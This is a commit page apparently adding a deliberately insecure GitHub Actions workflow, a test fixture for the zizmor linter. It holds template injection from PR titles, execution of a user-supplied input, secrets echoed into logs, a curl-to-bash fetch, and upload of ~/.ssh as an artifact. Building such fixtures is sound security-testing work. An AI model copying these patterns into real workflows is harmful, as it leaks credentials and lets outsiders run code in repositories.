Skip to content

Commit 5ab364b

Browse files
Preview/Zizmor: add github actions file to trigger zizmor
1 parent ef04b8d commit 5ab364b

1 file changed

Lines changed: 57 additions & 0 deletions

File tree

.github/workflows/actions.yml

Lines changed: 57 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,57 @@
1+
# Intentionally insecure test fixture. Do not use in production.
2+
on:
3+
pull_request_target:
4+
workflow_dispatch:
5+
inputs:
6+
cmd:
7+
required: true
8+
default: "echo hello"
9+
10+
permissions: write-all
11+
12+
jobs:
13+
bad:
14+
runs-on: ubuntu-latest
15+
env:
16+
AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
17+
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
18+
19+
steps:
20+
- uses: actions/checkout@v4
21+
with:
22+
persist-credentials: true
23+
ref: ${{ github.event.pull_request.head.ref }}
24+
25+
- uses: actions/setup-node@v4
26+
27+
- uses: docker://alpine:latest
28+
29+
- name: Cache untrusted dependency path
30+
uses: actions/cache@v4
31+
with:
32+
path: node_modules
33+
key: ${{ github.event.pull_request.title }}
34+
35+
- name: Template injection via PR title
36+
run: |
37+
echo "PR title: ${{ github.event.pull_request.title }}"
38+
echo "Branch: ${{ github.head_ref }}"
39+
40+
- name: Run user-controlled input
41+
run: |
42+
${{ github.event.inputs.cmd }}
43+
44+
- name: Leak secrets into logs
45+
run: |
46+
echo "AWS key is $AWS_SECRET_ACCESS_KEY"
47+
echo "Token is $GH_TOKEN"
48+
49+
- name: Dangerous curl bash
50+
run: |
51+
curl https://example.com/install.sh | bash
52+
53+
- name: Upload secrets as artifact
54+
uses: actions/upload-artifact@v4
55+
with:
56+
name: secrets
57+
path: ~/.ssh

0 commit comments

Comments
 (0)